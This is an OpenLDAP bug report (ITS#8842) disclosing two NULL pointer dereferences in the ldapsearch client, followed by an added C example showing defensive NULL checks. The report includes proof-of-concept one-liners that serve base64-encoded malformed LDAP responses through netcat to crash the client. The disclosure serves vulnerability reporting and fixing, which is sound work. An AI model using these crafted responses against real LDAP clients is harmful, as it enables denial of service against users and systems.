
(ITS#8842) NULL pointer dereference



Full_Name: Catz Meow
Version: openldap-2.4.46
OS: Archlinux
URL: ftp://ftp.openldap.org/incoming/
Submission from: (NULL) (134.19.121.246)


2 small issues:
I'm keeping it brief, let me know if you need more information.

A malicious LDAP server or mitm attacker can craft a response that causes the
ldap client to crash. Nothing critical, just a simple DoS.

echo "MAwCAQFhBwoBAAQABAAwNgIBAnkxBBFkYz1leGFtcGxlLGRjPWNvbQoBAgoBAAIBAAIBAAEBAIcL
b2JqZWN0Y2xhc3MwADCBiQIBAmSBgwQRZGM9ZXhhbXBsZSxkYz1jb20wbjAnBAtvYmplY3RDbGFz
czEYBAhkY09iamVjdAQMb3JnYW5pemF0aW9uMA8EAmRjMQkEB2V4YW1wbGUwDgQBbzEJBAdFeGFt
cGxlMCIEC2Rlc2NyaXB0aW9uMRMEEUV4YW1wbGUgZGlyZWN0b3J5MHkCAQJkdAQZY249cm9vdCxk
Yz1leGFtcGxlLGRjPWNvbTBXMCMEC29iamVjdENsYXNzMRQEEm9yZ2FuaXphdGlvbmFsUm9sZTAM
BAJjbjEGBARyb290MCIEC2Rlc2NyaXB0aW9uMRMEEURpcmVjdG9yeSBNYW5hZ2VyMIIBcAIBAmSC
AWkEGnVpZD1hZGFtLGRjPWV4YW1wbGUsZGM9Y29tMIIBSTA6BAtvYmplY3RDbGFzczErBAN0b3AE
B2FjY291bnQEDHBvc2l4QWNjb3VudAQNc2hhZG93QWNjb3VudDAMBAJjbjEGBARhZGFtMA0EA3Vp
ZDEGBARhZGFtMBQECXVpZE51bWJlcjEHBAUxNjg1OTASBAlnaWROdW1iZXIxBQQDMTAwMB0EDWhv
bWVEaXJlY3RvcnkxDAQKL2hvbWUvYWRhbTAZBApsb2dpblNoZWxsMQsECS9iaW4vYmFzaDAPBAVn
ZWNvczEGBARhZGFtMBcEEHNoYWRvd0xhc3RDaGFuZ2UxAwQBMDAQBAlzaGFkb3dNYXgxAwQBMDAU
BA1zaGFkb3dXYXJuaW5nMQMEATAwOAQMdXNlclBhc3N3b3JkMSgEJntTU0hBfXMzdWIwNnpCNVd2
UmVUZFZPOEVRelRMWVhvSFRCWGVNMAwCAQJlBwoBAAQABAA=" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


Affected code:
./clients/tools/ldapsearch.c

static int dosearch(
[...]
	case LDAP_RES_INTERMEDIATE:
		npartial++;
		ldap_parse_intermediate( ld, msg,
			&retoid, &retdata, NULL, 0 );
		nresponses_psearch = 0;
		/* retoid is used without a NULL check and the return code of
		 * ldap_parse_intermediate() is ignored */
		if ( strcmp( retoid, LDAP_SYNC_INFO ) == 0 ) {

The problem here is that retoid can be NULL after ldap_parse_intermediate() is
called.

Another NULL pointer dereference caused by a bad response:

echo "MAwCAQFhBwoBAAQABAAwgYkCAQJkgYMEEWRjPWV4YW1wbGUsZGM9AARtMG4wJwQLb2JqZWN0Q2xh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" | base64 -d | nc -lvp 14222

./clients/tools/.libs/ldapsearch -D cn=root,dc=example,dc=com -b
dc=example,dc=com -h 127.0.0.1:14222 -x -w secret


The PoC leads to memcpy being called with a NULL pointer as second argument
(ava->la_value.bv_val) in dn2domain() (libraries/libldap/getdn.c):

AC_MEMCPY( str, ava->la_value.bv_val,  ava->la_value.bv_len + 1);
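
As an added example (not code from this report or from OpenLDAP), the two checks a hardened client would make before the calls the report identifies: a NULL test on retoid (and on the return code of ldap_parse_intermediate()) before strcmp() in the LDAP_RES_INTERMEDIATE case, and a NULL test on bv_val before the memcpy() in the DN-to-domain path. struct berval is modelled locally with libldap's field names so the file compiles without libldap; the function names is_sync_info_oid and copy_ava_value, the parse_rc parameter and the sample values are constructed for this example.

```c
/* Added example, not OpenLDAP code: defensive handling of the two NULL
 * cases described in ITS#8842. Compiles stand-alone without libldap. */
#include <stdio.h>
#include <string.h>

/* Local stand-in for libldap's struct berval (same field names). */
struct berval {
    size_t bv_len;
    char  *bv_val;
};

/* OID of the LDAP Sync Info intermediate response (RFC 4533). */
#define LDAP_SYNC_INFO "1.3.6.1.4.1.4203.1.9.1.4"

/* Case 1: the responseName of an intermediate response is attacker
 * controlled and may be absent, so retoid can come back NULL. parse_rc is
 * the (assumed) return code of ldap_parse_intermediate(), 0 on success.
 * Returns 1 only when parsing succeeded and the OID is LDAP_SYNC_INFO. */
int is_sync_info_oid(int parse_rc, const char *retoid)
{
    if (parse_rc != 0 || retoid == NULL) {
        return 0;               /* treat as "not sync info", do not crash */
    }
    return strcmp(retoid, LDAP_SYNC_INFO) == 0;
}

/* Case 2: copy an attribute value (a berval) into dst as a C string.
 * A bv_val of NULL, which the second PoC produces, is rejected instead of
 * being handed to memcpy(). Returns bytes copied (without terminator) or
 * -1 on a NULL value or a value that would not fit. */
long copy_ava_value(char *dst, size_t dst_size, const struct berval *bv)
{
    if (dst == NULL || bv == NULL || bv->bv_val == NULL) {
        return -1;
    }
    if (bv->bv_len + 1 > dst_size) {
        return -1;              /* would overflow dst */
    }
    memcpy(dst, bv->bv_val, bv->bv_len);
    dst[bv->bv_len] = '\0';
    return (long)bv->bv_len;
}

int main(void)
{
    char buf[64];
    /* Constructed inputs modelling a well-formed and a malformed value. */
    char good_val[] = "example";
    struct berval good = { 7, good_val };
    struct berval bad  = { 7, NULL };

    printf("NULL oid      -> %d\n", is_sync_info_oid(0, NULL));
    printf("sync info oid -> %d\n", is_sync_info_oid(0, LDAP_SYNC_INFO));
    printf("good value    -> %ld (%s)\n",
           copy_ava_value(buf, sizeof buf, &good), buf);
    printf("NULL value    -> %ld\n", copy_ava_value(buf, sizeof buf, &bad));
    return 0;
}
```

Both helpers fail closed: a malformed response yields "not sync info" or an error return, and the caller can log and discard the message rather than dereferencing a NULL that the peer controls.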